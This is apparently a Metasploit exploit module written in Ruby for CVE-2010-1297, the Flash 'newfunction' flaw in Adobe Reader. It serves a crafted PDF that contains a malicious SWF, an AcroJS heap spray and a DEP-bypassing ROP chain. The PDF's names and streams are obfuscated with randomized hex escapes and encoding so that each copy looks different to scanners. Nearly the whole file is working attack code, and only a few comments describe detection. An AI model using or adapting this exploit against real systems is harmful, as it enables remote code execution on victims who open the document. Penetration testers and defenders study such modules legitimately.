##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'zlib'
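class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # Module metadata. The served document is a PDF that embeds a static SWF
  # (CVE-2010-1297, loaded from the framework data directory in #exploit) and an
  # AcroJS heap spray produced by #make_js. The 'Description' carries the author's
  # caveat that the DEP bypass relies on a hardcoded syscall number and is therefore
  # not expected to work across Windows versions.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Adobe Flash Player "newfunction" Invalid Pointer Use',
        'Description' => %q{
          This module exploits a vulnerability in the DoABC tag handling within
          versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also
          vulnerable, as are any other applications that may embed Flash player.

          Arbitrary code execution is achieved by embedding a specially crafted Flash
          movie into a PDF document. An AcroJS heap spray is used in order to ensure
          that the memory used by the invalid pointer issue is controlled.

          NOTE: This module uses a similar DEP bypass method to that used within the
          adobe_libtiff module. This method is unlikely to work across various
          Windows versions due a hardcoded syscall number.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # Found being openly exploited
          'jduck' # Metasploit version
        ],
        'References' => [
          ['CVE', '2010-1297'],
          ['OSVDB', '65141'],
          ['BID', '40586'],
          ['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],
          # For SWF->PDF embedding
          ['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          'HTTP::compression' => 'gzip',
          'HTTP::chunked' => true,
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
        'Payload' => {
          'Space' => 1000,
          'BadChars' => "\x00",
          'DisableNops' => true
        },
        'Platform' => 'win',
        'Targets' => [
          # Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd
          # Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd
          # Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd
          [ 'Automatic', {}],
        ],
        'DisclosureDate' => '2010-06-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Loads the static SWF from the framework data directory into @swf_data, then
  # hands off to the HttpServer mixin (super) which starts serving requests.
  #
  # File.binread reads the whole file in binary mode and closes the descriptor
  # even if the read raises; the previous open/read/close sequence left the
  # descriptor open on a failed read. A missing data file still raises
  # Errno::ENOENT, as before.
  def exploit
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2010-1297.swf")
    @swf_data = File.binread(path)

    super
  end

  # Serves one HTTP request: regenerates the payload for this client, wraps it in
  # the heap-spray script, embeds script and SWF in a freshly built PDF, and sends
  # it as application/pdf with caching disabled. handler(cli) then waits for the
  # payload's callback.
  #
  # @param cli [Rex::Socket] the connected client
  # @param request [Rex::Proto::Http::Request] the incoming request (unused here)
  def on_request_uri(cli, request)
    print_status("Sending crafted PDF w/SWF")

    js_data = make_js(regenerate_payload(cli).encoded)
    pdf_data = make_pdf(@swf_data, js_data)
    send_response(cli, pdf_data, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })

    # Handle the payload
    handler(cli)
  end

  # Builds the AcroJS heap-spray script as a String.
  #
  # stack_data is the author's ret2lib chain (annotated below as BIB.dll gadgets),
  # packed little-endian and prefixed to the encoded payload; the script unescapes
  # the whole buffer, pads it into a fixed-size block and duplicates that block
  # into a large array. Every JavaScript identifier is randomized per request, so
  # detection of this document family should key on structure (a long %u-escaped
  # unescape() argument, doubling while-loops, a large array of near-identical
  # strings) rather than on identifiers or file hashes.
  #
  # @param encoded_payload [String] the client-specific encoded payload
  # @return [String] JavaScript source for the PDF's /OpenAction
  def make_js(encoded_payload)
    # The following executes a ret2lib using BIB.dll
    # The effect is to bypass DEP and execute the shellcode in an indirect way
    stack_data = [
      0xc0c0c0c,
      0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret
      0xcccccccc,
      0x70048ef, # xchg eax,esp / ret
      0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]
      0xcccccccc,
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009033, # ret 0x18
      0x7009084, # ret
      0xc0c0c0c,
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7001599, # pop ebp / ret
      0x10124,
      0x70072f7, # pop eax / ret
      0x10104,
      0x70015bb, # pop ecx / ret
      0x1000,
      0x700154d, # mov [eax], ecx / ret
      0x70015bb, # pop ecx / ret
      0x7ffe0300, # -- location of KiFastSystemCall
      0x7007fb2, # mov eax, [ecx] / ret
      0x70015bb, # pop ecx / ret
      0x10011,
      0x700a8ac, # mov [ecx], eax / xor eax,eax / ret
      0x70015bb, # pop ecx / ret
      0x10100,
      0x700a8ac, # mov [ecx], eax / xor eax,eax / ret
      0x70072f7, # pop eax / ret
      0x10011,
      0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)
      0x7005c54, # pop esi / add esp,0x14 / ret
      0xffffffff,
      0x10100,
      0x0,
      0x10104,
      0x1000,
      0x40,
      # The next bit effectively copies data from the interleaved stack to the memory
      # pointed to by eax
      # The data copied is:
      # \x5a\x90\x54\x90\x5a\xeb\x15\x58\x8b\x1a\x89\x18\x83\xc0\x04\x83
      # \xc2\x04\x81\xfb\x0c\x0c\x0c\x0c\x75\xee\xeb\x05\xe8\xe6\xff\xff
      # \xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\x90
      0x700d731, # mov eax, [ebp-0x24] / ret
      0x70015bb, # pop ecx / ret
      0x9054905a,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x5815eb5a,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x18891a8b,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x8304c083,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0xfb8104c2,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0xc0c0c0c,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x5ebee75,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0xffffe6e8,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x909090ff,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x90909090,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x90909090,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x90ffffff,
      0x700154d, # mov [eax], ecx / ret
      0x700d731, # mov eax, [ebp-0x24] / ret
      0x700112f # call eax -- (execute stub to transition to full shellcode)
    ].pack('V*')

    # Identifiers are re-randomized for every request.
    var_unescape = rand_text_alpha(rand(100) + 1)
    var_shellcode = rand_text_alpha(rand(100) + 1)

    var_start = rand_text_alpha(rand(100) + 1)

    var_s = 0x10000
    var_c = rand_text_alpha(rand(100) + 1)
    var_b = rand_text_alpha(rand(100) + 1)
    var_d = rand_text_alpha(rand(100) + 1)
    var_3 = rand_text_alpha(rand(100) + 1)
    var_i = rand_text_alpha(rand(100) + 1)
    var_4 = rand_text_alpha(rand(100) + 1)

    # Chain followed by payload, then %u-escaped for JavaScript's unescape().
    payload_buf = ''
    payload_buf << stack_data
    payload_buf << encoded_payload

    escaped_payload = Rex::Text.to_unescape(payload_buf)

    js = %Q|
      var #{var_unescape} = unescape;
      var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );
      var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
      while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};
      #{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);
      #{var_b} += #{var_shellcode};
      #{var_b} += #{var_c};
      #{var_d} = #{var_b}.substring(0, #{var_s}/2);
      while(#{var_d}.length < 0x80000) #{var_d} += #{var_d};
      #{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);
      var #{var_4} = new Array();
      for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";
    |

    js
  end

  # Returns a String of `count` random bytes in the range 0x80..0xff.
  # Only referenced by the commented-out binary-comment line in #make_pdf.
  #
  # @param count [Integer] number of bytes to generate
  # @return [String]
  def random_non_ascii_string(count)
    result = ""
    count.times do
      result << (rand(128) + 128).chr
    end
    result
  end

  # Opening line of a PDF indirect object, e.g. "5 0 obj\n" (generation 0).
  #
  # @param id [Integer] object number
  # @return [String]
  def io_def(id)
    "%d 0 obj\n" % id
  end

  # Indirect reference to object `id`, e.g. "5 0 R" (generation 0).
  #
  # @param id [Integer] object number
  # @return [String]
  def io_ref(id)
    "%d 0 R" % id
  end

  # http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
  #
  # Randomly rewrites letters in PDF name/dictionary text as "#xx" hex escapes
  # (each letter has a 50% chance). The PDF reader still resolves the names, so
  # the output differs per request; scanners that match on literal names such as
  # /JavaScript or /RichMedia need to normalize "#xx" escapes first.
  #
  # @param str [String] dictionary text to obfuscate
  # @return [String]
  def n_obfu(str)
    result = ""
    str.scan(/./u) do |c|
      if rand(2) == 0 && c.upcase >= 'A' && c.upcase <= 'Z'
        result << "#%x" % c.unpack("C*")[0]
      else
        result << c
      end
    end
    result
  end

  # Encodes `str` for an /ASCIIHexDecode filter: two hex digits per byte, with a
  # random run of 1-3 spaces between bytes and the ">" end-of-data marker at the
  # end. The whitespace is ignored by the decoder but varies the output per request.
  #
  # @param str [String] bytes to encode
  # @return [String]
  def ascii_hex_whitespace_encode(str)
    result = ""
    whitespace = ""
    str.each_byte do |b|
      result << whitespace << "%02x" % b
      whitespace = " " * (rand(3) + 1)
    end
    result << ">"
  end

  # Assembles the PDF as a String.
  #
  # Object layout (numbers are fixed): 1 catalog with /OpenAction -> 5, a
  # JavaScript action whose code lives in stream 6 (ASCIIHex + Flate encoded);
  # 3/4 a single page whose only annotation 7 is a /RichMedia annotation pointing
  # at settings 8 (activation 10 on page open, deactivation 11), content 9,
  # assets 12 -> filespec 13 -> embedded-file stream 16 holding the SWF, and
  # configuration 14 / instance 15. The SWF is written as-is (it is already
  # compressed); the xref table and trailer are built from the recorded offsets.
  #
  # Because names are obfuscated and the JS stream uses random whitespace, every
  # response has a different hash; inspection should decode the
  # /FlateDecode /ASCIIHexDecode chain and normalize "#xx" escapes before matching.
  #
  # @param swf [String] raw SWF bytes
  # @param js [String] JavaScript source from #make_js
  # @return [String] the complete PDF
  def make_pdf(swf, js)
    swf_name = rand_text_alpha(8 + rand(8)) + ".swf"

    xref = []
    eol = "\n"
    endobj = "endobj" << eol

    # Randomize PDF version?
    pdf = "%PDF-1.5" << eol
    # pdf << "%" << random_non_ascii_string(4) << eol

    # catalog
    xref << pdf.length
    pdf << io_def(1) << n_obfu("<</Type/Catalog")
    pdf << n_obfu("/Pages ") << io_ref(3)
    pdf << n_obfu("/OpenAction ") << io_ref(5)
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # pages array
    xref << pdf.length
    pdf << io_def(3) << n_obfu("<</Type/Pages/Count 1/Kids [") << io_ref(4) << n_obfu("]>>") << eol << endobj

    # page 1
    xref << pdf.length
    pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3)
    pdf << n_obfu("/Annots [") << io_ref(7) << n_obfu("] ")
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # js action
    xref << pdf.length
    pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << eol << endobj

    # js stream
    xref << pdf.length
    compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
    pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
    pdf << "stream" << eol
    pdf << compressed << eol
    pdf << "endstream" << eol
    pdf << endobj

    # swf annotation object
    xref << pdf.length
    pdf << io_def(7) << n_obfu("<</Type/Annot/Subtype/RichMedia")
    pdf << n_obfu("/Rect [20 20 187 69] ")
    pdf << n_obfu("/RichMediaSettings ") << io_ref(8)
    pdf << n_obfu("/RichMediaContent ") << io_ref(9)
    pdf << n_obfu("/NM (") << swf_name << n_obfu(")")
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # rich media settings
    xref << pdf.length
    pdf << io_def(8)
    pdf << n_obfu("<</Type/RichMediaSettings/Subtype/Flash")
    pdf << n_obfu("/Activation ") << io_ref(10)
    pdf << n_obfu("/Deactivation ") << io_ref(11)
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # rich media content
    xref << pdf.length
    pdf << io_def(9)
    pdf << n_obfu("<</Type/RichMediaContent")
    pdf << n_obfu("/Assets ") << io_ref(12)
    pdf << n_obfu("/Configurations [") << io_ref(14) << "]"
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # rich media activation / deactivation
    xref << pdf.length
    pdf << io_def(10)
    pdf << n_obfu("<</Type/RichMediaActivation/Condition/PO>>")
    pdf << eol << endobj

    xref << pdf.length
    pdf << io_def(11)
    pdf << n_obfu("<</Type/RichMediaDeactivation/Condition/XD>>")
    pdf << eol << endobj

    # rich media assets
    xref << pdf.length
    pdf << io_def(12)
    pdf << n_obfu("<</Names [(#{swf_name}) ") << io_ref(13) << n_obfu("]>>")
    pdf << eol << endobj

    # swf embedded file ref
    xref << pdf.length
    pdf << io_def(13)
    pdf << n_obfu("<</Type/Filespec /EF <</F ") << io_ref(16) << n_obfu(">> /F(#{swf_name})>>")
    pdf << eol << endobj

    # rich media configuration
    xref << pdf.length
    pdf << io_def(14)
    pdf << n_obfu("<</Type/RichMediaConfiguration/Subtype/Flash")
    pdf << n_obfu("/Instances [") << io_ref(15) << n_obfu("]>>")
    pdf << eol << endobj

    # rich media instance
    xref << pdf.length
    pdf << io_def(15)
    pdf << n_obfu("<</Type/RichMediaInstance/Subtype/Flash")
    pdf << n_obfu("/Asset ") << io_ref(13)
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # swf stream
    # NOTE: This data is already compressed, no need to compress it again...
    xref << pdf.length
    pdf << io_def(16) << n_obfu("<</Type/EmbeddedFile/Length %s>>" % swf.length) << eol
    pdf << "stream" << eol
    pdf << swf << eol
    pdf << "endstream" << eol
    pdf << endobj

    # trailing stuff: xref table of the recorded offsets, then the trailer
    xref_position = pdf.length
    pdf << "xref" << eol
    pdf << "0 %d" % (xref.length + 1) << eol
    pdf << "0000000000 65535 f" << eol
    xref.each do |index|
      pdf << "%010d 00000 n" % index << eol
    end

    pdf << "trailer" << eol
    pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol

    pdf << "startxref" << eol
    pdf << xref_position.to_s << eol

    pdf << "%%EOF" << eol
    pdf
  end
end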